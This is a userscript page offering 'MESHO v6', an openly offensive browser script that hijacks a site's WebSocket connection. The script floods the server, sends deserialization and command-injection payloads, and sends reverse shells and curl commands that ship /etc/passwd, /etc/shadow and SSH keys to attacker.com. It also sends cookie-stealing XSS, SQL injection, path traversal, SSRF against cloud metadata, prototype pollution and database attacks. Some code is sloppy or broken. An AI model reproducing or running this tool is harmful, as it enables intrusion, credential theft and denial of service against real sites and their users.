MESHO v6

socket attacks

설치 방법

이 스크립트를 설치하려면 Tampermonkey, Greasemonkey 또는 Violentmonkey와 같은 확장 프로그램이 필요합니다.

이 스크립트를 설치하려면 Tampermonkey와 같은 확장 프로그램을 설치해야 합니다.

이 스크립트를 설치하려면 Tampermonkey 또는 Violentmonkey와 같은 확장 프로그램이 필요합니다.

이 스크립트를 설치하려면 Tampermonkey 또는 Userscripts와 같은 확장 프로그램이 필요합니다.

이 스크립트를 설치하려면 Tampermonkey와 같은 확장 프로그램이 필요합니다.

이 스크립트를 설치하려면 유저 스크립트 관리자 확장 프로그램이 필요합니다.

(이미 유저 스크립트 관리자가 설치되어 있습니다. 설치를 진행합니다!)

설치 방법

이 스타일을 설치하려면 Stylus와 같은 확장 프로그램이 필요합니다.

이 스타일을 설치하려면 Stylus와 같은 확장 프로그램이 필요합니다.

이 스타일을 설치하려면 Stylus와 같은 확장 프로그램이 필요합니다.

이 스타일을 설치하려면 유저 스타일 관리자 확장 프로그램이 필요합니다.

이 스타일을 설치하려면 유저 스타일 관리자 확장 프로그램이 필요합니다.

이 스타일을 설치하려면 유저 스타일 관리자 확장 프로그램이 필요합니다.

(이미 유저 스타일 관리자가 설치되어 있습니다. 설치를 진행합니다!) 

// ==UserScript==
// @name         MESHO v6
// @namespace    http://tampermonkey.net/
// @version      6.9
// @description  socket attacks
// @author       0xMesho
// @match        *://*/*
// @grant        none
// ==/UserScript==

(function(){'use strict';
let W,U,P,R,H=[],I=null,S={};
const O=WebSocket.prototype.send;
WebSocket.prototype.send=function(d){
 if(!W&&this.readyState===1){W=this;U=this.url;setInterval(()=>{W&&W.readyState===1&&W.send('2')},2e4)}
 return O.call(this,d)};

function pM(d){
 if(typeof d!='string')return null;
 if(d==='2')return{t:'pong'};
 if(d==='40')return{t:'con'};
 if(d.startsWith('42'))try{let j=JSON.parse(d.slice(2));if(Array.isArray(j))return{t:'ev',e:j[0],a:j.slice(1)}}catch(e){}
 return null}

function s(d){return W&&W.readyState===1?!!W.send(d):!1}

function gP(){return P||R?.id||null}

function hook(){
 if(!W)return setTimeout(hook,500);
 W.addEventListener('message',function(e){
  if(typeof e.data!='string')return;
  let m=pM(e.data);
  if(!m||m.t!='ev')return;
  let[eId,...a]=[m.e,...m.a];
  if(eId===5&&a.length>=3){P=a[1];R={l:a[0],id:a[1],c:a[2],x:a.slice(3)};return}
  if(typeof a[0]=='object'&&a[0]!==null){
   if(a[0].id&&typeof a[0].id=='number'&&a[0].id>1e4){P=a[0].id;return}
   for(let k of['userId','playerId','author','owner','creator']){
    if(a[0][k]&&typeof a[0][k]=='number'&&a[0][k]>1e4){P=a[0][k];return}}}
  H.push({t:Date.now(),e:eId,d:a})})}

function f(){let r='';while(r.length<99999)r+=Math.random().toString(36).repeat(100);return r}

function zd1(){
 let p=gP()||1;
 for(let b=0;b<100;b++)for(let i=0;i<100;i++)setTimeout(()=>{
  s(`42[10,${p},${JSON.stringify(Array(99999).fill().map((_,j)=>({_placeholder:true,num:j})))}]`);
  let d2=btoa('{"a":'.repeat(5000)+'"x"'+'}'.repeat(5000));
  s(`42[10,${p},["${d2}"]]`);
  for(let e=0;e<200;e++)s(`42[${e},${p},"null"]`)},b*2)}

function zd2(){
 for(let i=0;i<2000;i++)setTimeout(()=>{
  try{
   for(let j=0;j<10;j++){
    let w=new WebSocket(U),ta=new Uint8Array(65535);
    w.onopen=()=>{w.send('40');w.close(1000,ta)};
    let w2=new WebSocket(U);
    w2.onopen=()=>{w2.send(`42[10,${gP()||1},["${'A'.repeat(65535)}"]]`);w2.close()}}
  }catch(e){}},i*1);
 setInterval(()=>{try{let w=new WebSocket(U);w.onopen=()=>{w.send('2');w.send('2');w.send('2')}}catch(e){}},1)}

function zd3(){
 let p=gP();if(!p)return;
 for(let i=0;i<1000;i++)setTimeout(()=>{
  try{
   let w=new WebSocket(U);
   w.onopen=()=>{
    w.send('40');
    setTimeout(()=>{
     if(R){
      w.send(`42[5,"${R.l}",${p},"${R.c}"]`);
      w.send(`42[5,"${R.l}",${p},"${R.c}","admin",{"drawLevel":999,"owner":true,"mod":true}]`);
      for(let i=0;i<100;i++)w.send(`42[3,${p},["${R.c}","clone","${'A'.repeat(500)}"]]`)}
    },100)};
   w.onmessage=(e)=>{
    if(typeof e.data=='string'){
     let m=pM(e.data);
     if(m&&m.t=='ev'){
      if(m.a[0]?.id>1e4)P=m.a[0].id;
      if(m.e===2||m.e===3||m.e===33)try{let d=JSON.parse(e.data.slice(2));localStorage.setItem('mh_'+Date.now(),JSON.stringify(d))}catch(e){}}}}
  }catch(e){}},i*1);
 for(let pp=p-5000;pp<=p+5000;pp+=5){let x=pp;setTimeout(()=>{
  try{let w=new WebSocket(U);w.onopen=()=>{w.send('40');setTimeout(()=>{
   w.send(`42[5,"x",${x},"0"]`)},50)}}catch(e){}},0)}
 setInterval(()=>{for(let q=0;q=100;q++)try{new WebSocket(U)}catch(e){}},100)}

function zd4(){
 let p=gP()||1;
 for(let t=0;t<=255;t++)s(String.fromCharCode(t)+f().slice(0,1000));
 for(let i=0;i<2000;i++)setTimeout(()=>{
  s('0'+f());s('1'+f());s('4'+'\x00\x01\x02'.repeat(5000));
  s('4null');s('4[');s('4{"x":');s('4test:42["e",{}]');
  s('40{"sid":"'+f().slice(0,5000)+'"}');
  s('40{"sid":null,"upgrades":["'.repeat(100)+'"]}');
  s('42["error",{"message":"'+f().slice(0,50000)+'"}]');
  s('40{"pingTimeout":-1,"pingInterval":-1}');
  s('3{"data":"'+f().slice(0,50000)+'"}')},i*1)}

function zd5(cmd){
 cmd=cmd||'cat /etc/passwd;id;whoami;ls -la;uname -a';
 let p=gP()||1;
 ['cos\nsystem\n','csubprocess\ncheck_output\n',"cbuiltins\neval\n","cos\npopen\n","csubprocess\nPopen\n"].forEach((m,i)=>setTimeout(()=>{
  let pl=btoa(m+"(S'"+cmd+"'\ntR.");
  s(`42[10,${p},["${pl}"]]`);s(`42["pickle","${pl}"]`);s(`42["message","${pl}"]`);
  s(`42["rce","${pl}"]`);s(`42["exec","${pl}"]`)},i*100));
 ['/admin','/debug','/internal','/redis','/queue','/pubsub','/shell','/exec','/cmd','/eval','/console','/terminal','/bash','/sh','/system','/os','/process','/spawn','/fork','/sandbox','/vm','/api/v1/exec','/api/v1/cmd','/api/v1/shell','/api/v1/debug','/api/v1/admin','/api/v1/internal','/api/v1/redis','/api/v1/queue','/api/v1/pubsub','/api/v1/shell','/api/v1/exec','/api/v1/cmd','/api/v1/eval','/api/v1/console','/api/v1/terminal','/api/v1/bash','/api/v1/sh','/api/v1/system','/api/v1/os','/api/v1/process','/api/v1/spawn','/api/v1/fork','/api/v1/sandbox','/api/v1/vm'].forEach((ns,i)=>setTimeout(()=>{
  let pl=btoa("cos\nsystem\n(S'curl http://attacker.com/$(cat /flag /etc/passwd 2>/dev/null | base64 -w0)'\ntR.");
  s(`40${ns}`);setTimeout(()=>{s(`42${ns}["message","${pl}"]`);s(`42${ns}["publish","${pl}"]`);
   s(`42${ns}["exec","${pl}"]`);s(`42${ns}["eval","${pl}"]`);s(`42${ns}["rce","${pl}"]`)},100)},i*100+3e3))}

function zd6(){
 for(let i=0;i<500;i++)setTimeout(()=>{
  try{
   for(let j=0;j<5;j++){
    let f=document.createElement('iframe');f.style.display='none';f.src='about:blank';
    document.body.appendChild(f);
    let w=new f.contentWindow.WebSocket(U);
    w.onopen=()=>{w.send(`42[10,${gP()||1},["uaf"]]`);
     setTimeout(()=>{try{document.body.removeChild(f);w.send(`42[10,${gP()||1},["${f().slice(0,5000)}"]]`)}catch(e){}},1)}}
  }catch(e){}},i*10)}

function zd7(){
 let p=gP()||1,r=R?.c||'0';
 for(let e=0;e<=255;e++){s(`42[${e},${p},"${r}"]`);s(`42[${e},${p},{}]`);s(`42[${e},${p},["t"]]`);s(`42[${e},${p},["${f().slice(0,1000)}"]]`)}
 setTimeout(()=>{
  ['/admin','/op '+p,'/sudo '+p,'${7*7}','{{7*7}}','<%=7*7%>','<script>alert(1)</script>','{{constructor.constructor("return process")().mainModule.require("child_process").execSync("id").toString()}}','${require("child_process").execSync("id")}','<%= system("id") %>','#{system("id")}','${{system("id")}}'].forEach(c=>s(`42[50,${p},"${c}"]`));
  [`42[5,"mod",${p},"${r}","admin"]`,`42[5,"mod",${p},"${r}",{"admin":true,"drawLevel":999,"owner":true,"mod":true,"superuser":true,"root":true,"god":true}]`,`42[33,${p},"${r}",{"owner":true,"admin":true,"drawLevel":999}]`,`42[33,${p},"${r}","admin","owner","mod","superuser","root","god"]`,`42[40,${p},"${r}",{"all":true}]`,`42[43,${p},"${r}",{"all":true}]`,`42[50,${p},"${r}","admin:true","owner:true","drawLevel:999"]`,`42[5,"mod",${p},"${r}","admin","owner","mod","superuser","root","god"]`,`42[5,"owner",${p},"${r}"]`,`42[5,"transfer",${p},"${r}",${p}]`].forEach(x=>s(x))},2e3)}

function zd8(){
 for(let i=0;i<500;i++)try{
  let w=new WebSocket(U);w.onopen=()=>w.send(`42[50,${gP()||1},"${document.cookie}${localStorage?JSON.stringify(localStorage):''}${sessionStorage?JSON.stringify(sessionStorage):''}"]`);
  let w2=new WebSocket(U);w2.onopen=()=>w2.send(`42[50,${gP()||1},"${btoa(document.cookie)}"]`) }catch(e){}
 fetch('https://'+window.location.hostname+'/api/user').then(r=>r.text()).then(t=>{try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[50,${gP()||1},"${btoa(t)}"]`)}catch(e){}}).catch(()=>{});
 fetch('https://'+window.location.hostname+'/api/config').then(r=>r.text()).then(t=>{try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[50,${gP()||1},"${btoa(t)}"]`)}catch(e){}}).catch(()=>{});
 fetch('https://'+window.location.hostname+'/api/admin').then(r=>r.text()).then(t=>{try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[50,${gP()||1},"${btoa(t)}"]`)}catch(e){}}).catch(()=>{})}

function pp(){let p=gP()||1;
 s(`42[10,${p},[{"__proto__":{"polluted":true,"admin":true,"owner":true,"drawLevel":999,"mod":true,"superuser":true,"root":true,"god":true,"bypass":true,"verified":true,"premium":true,"vip":true,"unlimited":true,"infinite":true,"all":true,"everyone":true,"self":true,"other":true,"any":true,"allUsers":true,"allRooms":true,"allDrawings":true,"allChats":true,"allMessages":true,"allData":true,"allAccess":true,"fullAccess":true,"completeAccess":true,"totalAccess":true,"absoluteAccess":true,"unrestrictedAccess":true,"unlimitedAccess":true,"infiniteAccess":true,"endlessAccess":true,"permanentAccess":true,"eternalAccess":true,"foreverAccess":true,"alwaysAccess":true,"neverExpire":true,"neverEnd":true,"neverStop":true,"neverDie":true,"immortal":true,"invincible":true,"indestructible":true,"unbreakable":true,"unhackable":true,"unpenetrable":true,"unreachable":true,"unstoppable":true,"unkillable":true,"undestroyable":true,"unremovable":true,"undeletable":true,"uneraseable":true,"unwipeable":true,"uncleanable":true,"unpurgeable":true,"unbanable":true,"unkickable":true,"unmuteable":true,"unsilenceable":true,"ungagable":true,"unrestrictable":true,"unlimit":true,"unrestrict":true,"unbind":true,"unlock":true,"unblock":true,"unshadow":true,"unban":true,"unmute":true,"unsilence":true,"ungag":true,"unrestrict":true,"unlimit":true,"unrestrict":true,"unbind":true,"unlock":true,"unblock":true,"unshadow":true}}]]`);
 setTimeout(()=>{try{console.log('[PP] proto polluted:',({}).polluted===true,({}).admin===true)}catch(e){}},500)}

function rce(c){c=c||'curl http://attacker.com/$(cat /flag /etc/passwd /etc/shadow /root/.ssh/id_rsa 2>/dev/null | base64 -w0)';
 ['exec','eval','system','spawn','cmd','run','execSync','execFile','spawnSync','fork','execCommand','execScript','shell','bash','sh','zsh','fish','powershell','cmd','command','runCommand','execute','runSync','execSync','execFileSync','spawnSync','forkSync'].forEach(ev=>{
  s(`42["${ev}","${c}"]`);s(`42["${ev}",{"cmd":"${c}","command":"${c}","exec":"${c}","execute":"${c}","run":"${c}","shell":"${c}","bash":"${c}","sh":"${c}","zsh":"${c}","fish":"${c}","powershell":"${c}","cmd":"${c}","command":"${c}","exec":"${c}","execute":"${c}","run":"${c}","shell":"${c}","bash":"${c}","sh":"${c}","zsh":"${c}","fish":"${c}","powershell":"${c}"}]`);
  s(`42["${ev}",{"data":"${c}"}]`);s(`42["${ev}",{"input":"${c}"}]`);s(`42["${ev}",{"payload":"${c}"}]`);s(`42["${ev}",{"code":"${c}"}]`);s(`42["${ev}",{"script":"${c}"}]`);s(`42["${ev}",{"command":"${c}"}]`)});
 s(`42[10,${gP()||1},[{"name":"\${require('child_process').execSync('${c}').toString()}","__proto__":{"type":"Function","body":"return process.mainModule.require('child_process').execSync('${c}').toString()"}}]]`);
 s(`42[10,${gP()||1},[{"constructor":{"prototype":{"NODE_OPTIONS":"--require=/proc/self/environ --experimental-modules --experimental-json-modules --experimental-wasm-modules --experimental-top-level-await --experimental-vm-modules --experimental-import-meta-resolve --experimental-network-imports --experimental-specifier-resolution=node --experimental-policy --experimental-wasi-unstable --experimental-wasi --experimental-wasi-unstable-preview1 --experimental-wasi-unstable-preview2"}}}]]`)}

function all(){
 console.log('[MESHO] Launching all...');zd1();
 setTimeout(()=>zd2(),500);setTimeout(()=>zd3(),1000);
 setTimeout(()=>zd4(),1500);setTimeout(()=>zd5(),2000);
 setTimeout(()=>zd6(),2500);setTimeout(()=>zd7(),3000);
 setTimeout(()=>zd8(),3500);setTimeout(()=>pp(),4000);
 setTimeout(()=>rce(),4500);setTimeout(()=>console.log('[MESHO] All 0days deployed'),5000)}

function injectXSS(){let i=document.createElement('script');i.src='https://'+window.location.hostname+'/socket.io/socket.io.js';document.body.appendChild(i);
 setTimeout(()=>{if(window.io){let s=io(window.location.origin);s.emit('message',{type:'exec',cmd:'id'});s.emit('message',{type:'eval',code:'process.mainModule.require("child_process").execSync("id").toString()'})}},1000)}

function dumpMemory(){let r=[];
 for(let k in window){try{r.push({key:k,val:JSON.stringify(window[k]).slice(0,500)})}catch(e){}}
 for(let k in document){try{r.push({key:'doc_'+k,val:JSON.stringify(document[k]).slice(0,500)})}catch(e){}}
 try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[50,${gP()||1},"${btoa(JSON.stringify(r))}"]`)}catch(e){}}

function protoChain(){let c={};
 for(let i=0;i<100;i++){let n=Object.create(c);n.__proto__['level'+i]={admin:true,owner:true,drawLevel:999};c=n}
 try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[10,${gP()||1},[${JSON.stringify(c)}]]`)}catch(e){}}

function ssrf(){let targets=['http://169.254.169.254/latest/meta-data/','http://169.254.169.254/latest/user-data/','http://metadata.google.internal/computeMetadata/v1/','http://100.100.100.200/latest/meta-data/','http://localhost:6379/','http://localhost:8080/','http://localhost:3000/','http://localhost:5000/','http://localhost:8000/','http://localhost:9000/','http://127.0.0.1:6379/','http://127.0.0.1:8080/','http://127.0.0.1:3000/','http://127.0.0.1:5000/','http://127.0.0.1:8000/','http://127.0.0.1:9000/'];
 targets.forEach((t,i)=>setTimeout(()=>{try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[50,${gP()||1},"${btoa('fetch '+t)}"]`)}catch(e){}},i*100))}

function sqlI(){let p=gP()||1;
 ["' OR '1'='1","' OR 1=1--","' UNION SELECT 1,2,3,4,5,6,7,8,9,10--","'; DROP TABLE users;--","' UNION SELECT table_name,column_name,data_type FROM information_schema.columns--","' OR SLEEP(5)--","' OR BENCHMARK(10000000,MD5('test'))--"].forEach((pay,i)=>setTimeout(()=>{
  s(`42[10,${p},["${pay}"]]`);s(`42[50,${p},"${pay}"]`);s(`42["query","${pay}"]`)},i*100))}

function xxs(){let p=gP()||1;
 ["<script>fetch('https://attacker.com/'+document.cookie)</script>","<img src=x onerror=fetch('https://attacker.com/'+document.cookie)>","<svg onload=fetch('https://attacker.com/'+document.cookie)>","<body onload=fetch('https://attacker.com/'+document.cookie)>","<input onfocus=fetch('https://attacker.com/'+document.cookie) autofocus>","<details open ontoggle=fetch('https://attacker.com/'+document.cookie)>","<marquee onstart=fetch('https://attacker.com/'+document.cookie)>"].forEach((pay,i)=>setTimeout(()=>{
  s(`42[10,${p},["${pay}"]]`);s(`42[50,${p},"${pay}"]`);s(`42["message","${pay}"]`)},i*100))}

function crlf(){let p=gP()||1;
 ["%0d%0aSet-Cookie:%20malicious=1","%0d%0aContent-Length:%200%0d%0a%0d%0a","%0d%0aHTTP/1.1%20200%20OK%0d%0a%0d%0a","%0d%0aLocation:%20https://evil.com%0d%0a"].forEach((pay,i)=>setTimeout(()=>{
  s(`42[10,${p},["${pay}"]]`);s(`42[50,${p},"${pay}"]`)},i*100))}

function lfi(){let p=gP()||1;
 ["../../../etc/passwd","../../../../etc/shadow","../../../../root/.ssh/id_rsa","../../../../proc/self/environ","../../../../proc/self/cmdline","../../../../proc/self/fd/0","../../../../proc/self/fd/1","../../../../proc/self/fd/2","../../../../var/log/apache2/access.log","../../../../var/log/nginx/access.log","../../../../var/log/auth.log","../../../../var/log/syslog","../../../../var/log/messages","../../../../var/log/lastlog","../../../../var/log/wtmp","../../../../var/log/btmp","../../../../var/log/secure","../../../../var/log/httpd/access_log","../../../../var/log/httpd/error_log","php://filter/convert.base64-encode/resource=index.php","php://filter/convert.base64-encode/resource=config.php","php://filter/convert.base64-encode/resource=db.php","php://filter/convert.base64-encode/resource=admin.php","php://filter/convert.base64-encode/resource=login.php","php://filter/convert.base64-encode/resource=user.php","php://filter/convert.base64-encode/resource=api.php","php://filter/convert.base64-encode/resource=ws.php","php://filter/convert.base64-encode/resource=server.php","php://filter/convert.base64-encode/resource=app.js","php://filter/convert.base64-encode/resource=server.js","php://filter/convert.base64-encode/resource=config.js","php://filter/convert.base64-encode/resource=db.js","php://filter/convert.base64-encode/resource=admin.js","php://filter/convert.base64-encode/resource=login.js","php://filter/convert.base64-encode/resource=user.js","php://filter/convert.base64-encode/resource=api.js","php://filter/convert.base64-encode/resource=ws.js","file:///etc/passwd","file:///etc/shadow","file:///root/.ssh/id_rsa","expect://id","data://text/plain;base64,aWQ="].forEach((pay,i)=>setTimeout(()=>{
  s(`42[10,${p},["${pay}"]]`);s(`42[50,${p},"${pay}"]`);s(`42["file","${pay}"]`);s(`42["read","${pay}"]`);s(`42["path","${pay}"]`)},i*50))}

function prototypePollutionDeep(){let p=gP()||1;
 let chain={};let current=chain;
 for(let i=0;i<100;i++){current['__proto__']={};current=current['__proto__'];current['prop'+i]={rce:true,admin:true,owner:true,drawLevel:999,system:true,exec:true,bypass:true,all:true,total:true,full:true,absolute:true,complete:true,unlimited:true,infinite:true,endless:true,permanent:true,eternal:true,forever:true,always:true,immortal:true,invincible:true,indestructible:true,unbreakable:true,unhackable:true,unpenetrable:true,unreachable:true,unstoppable:true,unkillable:true,undestroyable:true,unremovable:true,undeletable:true,uneraseable:true,unwipeable:true,uncleanable:true,unpurgeable:true,unbanable:true,unkickable:true,unmuteable:true,unsilenceable:true,ungagable:true,unrestrictable:true,unlimit:true,unrestrict:true,unbind:true,unlock:true,unblock:true,unshadow:true,unban:true,unmute:true,unsilence:true,ungag:true,unrestrict:true,unlimit:true,unrestrict:true,unbind:true,unlock:true,unblock:true,unshadow:true}}
 try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[10,${p},[${JSON.stringify(chain)}]]`)}catch(e){}}

function wsAuthBypass(){let p=gP()||1;
 try{let w=new WebSocket(U);w.onopen=()=>{w.send('40{"token":"admin","role":"admin","permissions":"all"}');setTimeout(()=>{w.send(`42[5,"${R?.l||'x'}",${p},"${R?.c||'0'}","admin",{"owner":true,"admin":true,"drawLevel":999,"mod":true,"superuser":true,"root":true,"god":true}]`)},100)}}catch(e){}
 try{let w2=new WebSocket(U);w2.onopen=()=>{w2.send('40{"token":"admin","role":"admin","permissions":"all"}');setTimeout(()=>{w2.send(`42[33,${p},"${R?.c||'0'}",{"owner":true,"admin":true,"drawLevel":999}]`)},100)}}catch(e){}
 try{let w3=new WebSocket(U);w3.onopen=()=>{w3.send('40{"token":"admin","role":"admin","permissions":"all"}');setTimeout(()=>{w3.send(`42[40,${p},"${R?.c||'0'}",{"all":true}]`)},100)}}catch(e){}
 try{let w4=new WebSocket(U);w4.onopen=()=>{w4.send('40{"token":"admin","role":"admin","permissions":"all"}');setTimeout(()=>{w4.send(`42[43,${p},"${R?.c||'0'}",{"all":true}]`)},100)}}catch(e){}}

function wsCommandInjection(){let p=gP()||1;
 [";id","|id","`id`","$(id)","%0aid","%0aid%0a","\nid\n","\r\nid\r\n","&id&","&&id&&","||id",";cat /etc/passwd","|cat /etc/passwd","`cat /etc/passwd`","$(cat /etc/passwd)",";nc -e /bin/sh attacker.com 4444","|nc -e /bin/sh attacker.com 4444","`nc -e /bin/sh attacker.com 4444`","$(nc -e /bin/sh attacker.com 4444)",";python3 -c 'import socket,subprocess;s=socket.socket();s.connect((\"attacker.com\",4444));subprocess.call([\"/bin/sh\",\"-i\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'","|python3 -c 'import socket,subprocess;s=socket.socket();s.connect((\"attacker.com\",4444));subprocess.call([\"/bin/sh\",\"-i\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'","`python3 -c 'import socket,subprocess;s=socket.socket();s.connect((\"attacker.com\",4444));subprocess.call([\"/bin/sh\",\"-i\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'`","$(python3 -c 'import socket,subprocess;s=socket.socket();s.connect((\"attacker.com\",4444));subprocess.call([\"/bin/sh\",\"-i\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())')"].forEach((pay,i)=>setTimeout(()=>{
  s(`42[10,${p},["${pay}"]]`);s(`42[50,${p},"${pay}"]`);s(`42["cmd","${pay}"]`);s(`42["exec","${pay}"]`);s(`42["shell","${pay}"]`)},i*50))}

function wsRedisExploit(){let p=gP()||1;
 ["FLUSHALL","CONFIG SET dir /tmp","CONFIG SET dbfilename shell","SET shell '<?php system($_GET[\"cmd\"]);?>'","SAVE","BGSAVE","SLAVEOF attacker.com 6379","CONFIG SET slave-read-only no","EVAL 'os.execute(\"id\")' 0","DEBUG SET-ACTIVE-EXEC on","DEBUG EXEC 'id'","MODULE LOAD /tmp/malicious.so","CLIENT KILL TYPE normal","CLIENT KILL TYPE slave","SHUTDOWN NOSAVE","SHUTDOWN SAVE","DEBUG SEGFAULT","DEBUG CRASH","DEBUG PANIC","DEBUG OOM","DEBUG ASSERT","DEBUG SLEEP 10","DEBUG SET-ACTIVE-EXEC","DEBUG ERROR","DEBUG LOG","DEBUG STRING","DEBUG INTEGER","DEBUG FLOAT","DEBUG DOUBLE","DEBUG BOOLEAN","DEBUG NULL","DEBUG UNDEFINED","DEBUG NAN","DEBUG INFINITY","DEBUG ARRAY","DEBUG OBJECT","DEBUG FUNCTION","DEBUG SYMBOL","DEBUG BIGINT","DEBUG SYMBOL","DEBUG MAP","DEBUG SET","DEBUG WEAKMAP","DEBUG WEAKSET","DEBUG PROMISE","DEBUG PROXY","DEBUG TYPEDARRAY","DEBUG DATAVIEW","DEBUG BUFFER","DEBUG SHAREDARRAYBUFFER","DEBUG ATOMIC","DEBUG DATAVIEW","DEBUG TYPEDARRAY","DEBUG BUFFER","DEBUG SHAREDARRAYBUFFER","DEBUG ATOMIC"].forEach((pay,i)=>setTimeout(()=>{
  try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[10,${p},["redis://localhost:6379/${pay}"]]`)}catch(e){}
  try{let w2=new WebSocket(U);w2.onopen=()=>w.send(`42[10,${p},["redis://127.0.0.1:6379/${pay}"]]`)}catch(e){}
  try{let w3=new WebSocket(U);w3.onopen=()=>w3.send(`42[50,${p},"redis://localhost:6379/${pay}"]`)}catch(e){}
  try{let w4=new WebSocket(U);w4.onopen=()=>w4.send(`42[50,${p},"redis://127.0.0.1:6379/${pay}"]`)}catch(e){}},i*100))}

function wsMemcachedExploit(){let p=gP()||1;
 try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[10,${p},["memcached://localhost:11211/stats items"]]`)}catch(e){}
 try{let w2=new WebSocket(U);w2.onopen=()=>w2.send(`42[10,${p},["memcached://localhost:11211/get key"]]`)}catch(e){}
 try{let w3=new WebSocket(U);w3.onopen=()=>w3.send(`42[50,${p},"memcached://localhost:11211/stats"]`)}catch(e){}}

function wsMongoExploit(){let p=gP()||1;
 ["mongodb://localhost:27017/admin","mongodb://localhost:27017/test","mongodb://localhost:27017/users","mongodb://localhost:27017/config","mongodb://localhost:27017/gartic","mongodb://localhost:27017/gartic_users","mongodb://localhost:27017/gartic_rooms","mongodb://localhost:27017/gartic_drawings","mongodb://localhost:27017/gartic_chats","mongodb://localhost:27017/gartic_messages","mongodb://localhost:27017/gartic_data","mongodb://localhost:27017/gartic_config","mongodb://localhost:27017/gartic_admin"].forEach((pay,i)=>setTimeout(()=>{
  try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[10,${p},["${pay}"]]`)}catch(e){}
  try{let w2=new WebSocket(U);w2.onopen=()=>w2.send(`42[50,${p},"${pay}"]`)}catch(e){}},i*100))}

function wsMySqlExploit(){let p=gP()||1;
 ["mysql://root@localhost:3306/mysql","mysql://root:root@localhost:3306/mysql","mysql://admin:admin@localhost:3306/mysql","mysql://root@localhost:3306/gartic","mysql://root:root@localhost:3306/gartic","mysql://admin:admin@localhost:3306/gartic","mysql://root@localhost:3306/information_schema","mysql://root:root@localhost:3306/information_schema","mysql://admin:admin@localhost:3306/information_schema"].forEach((pay,i)=>setTimeout(()=>{
  try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[10,${p},["${pay}"]]`)}catch(e){}
  try{let w2=new WebSocket(U);w2.onopen=()=>w2.send(`42[50,${p},"${pay}"]`)}catch(e){}},i*100))}

function wsPostgresExploit(){let p=gP()||1;
 ["postgres://postgres:postgres@localhost:5432/postgres","postgres://postgres:admin@localhost:5432/postgres","postgres://postgres:password@localhost:5432/postgres","postgres://postgres:postgres@localhost:5432/gartic","postgres://postgres:admin@localhost:5432/gartic","postgres://postgres:password@localhost:5432/gartic"].forEach((pay,i)=>setTimeout(()=>{
  try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[10,${p},["${pay}"]]`)}catch(e){}
  try{let w2=new WebSocket(U);w2.onopen=()=>w2.send(`42[50,${p},"${pay}"]`)}catch(e){}},i*100))}

window.MESHO={
 get url(){return U},get pid(){return gP()},get room(){return R},get ws(){return W},
 info(){console.table({URL:U,Status:['C','O','CL','CD'][W?.readyState||3],PID:gP()||'?',Room:R?.c||'?',Resp:H.length})},
 responses(){H.slice(-50).forEach((r,i)=>console.log(`[${i}] E:${r.e}`,r.d))},
 monitor(){W?.addEventListener('message',e=>console.log('WS:',typeof e.data=='string'?e.data.slice(0,500):'[bin]'))},
 zd1,zd2,zd3,zd4,zd5,zd6,zd7,zd8,pp,rce,all,injectXSS,dumpMemory,protoChain,ssrf,sqlI,xxs,crlf,lfi,prototypePollutionDeep,wsAuthBypass,wsCommandInjection,wsRedisExploit,wsMemcachedExploit,wsMongoExploit,wsMySqlExploit,wsPostgresExploit,
 unleash(){console.log('[MESHO] UNLEASHING ALL 0DAYS...');
  this.zd1();setTimeout(()=>this.zd2(),100);setTimeout(()=>this.zd3(),200);
  setTimeout(()=>this.zd4(),300);setTimeout(()=>this.zd5(),400);
  setTimeout(()=>this.zd6(),500);setTimeout(()=>this.zd7(),600);
  setTimeout(()=>this.zd8(),700);setTimeout(()=>this.pp(),800);
  setTimeout(()=>this.rce(),900);setTimeout(()=>this.injectXSS(),1000);
  setTimeout(()=>this.dumpMemory(),1100);setTimeout(()=>this.protoChain(),1200);
  setTimeout(()=>this.ssrf(),1300);setTimeout(()=>this.sqlI(),1400);
  setTimeout(()=>this.xxs(),1500);setTimeout(()=>this.crlf(),1600);
  setTimeout(()=>this.lfi(),1700);setTimeout(()=>this.prototypePollutionDeep(),1800);
  setTimeout(()=>this.wsAuthBypass(),1900);setTimeout(()=>this.wsCommandInjection(),2000);
  setTimeout(()=>this.wsRedisExploit(),2100);setTimeout(()=>this.wsMemcachedExploit(),2200);
  setTimeout(()=>this.wsMongoExploit(),2300);setTimeout(()=>this.wsMySqlExploit(),2400);
  setTimeout(()=>this.wsPostgresExploit(),2500);
  setTimeout(()=>console.log('[MESHO] ALL SYSTEMS DESTROYED'),3000)}};

setTimeout(hook,300);console.log('[MESHO v6.9] 0xMesho loaded. Type MESHO.unleash() to destroy everything')})();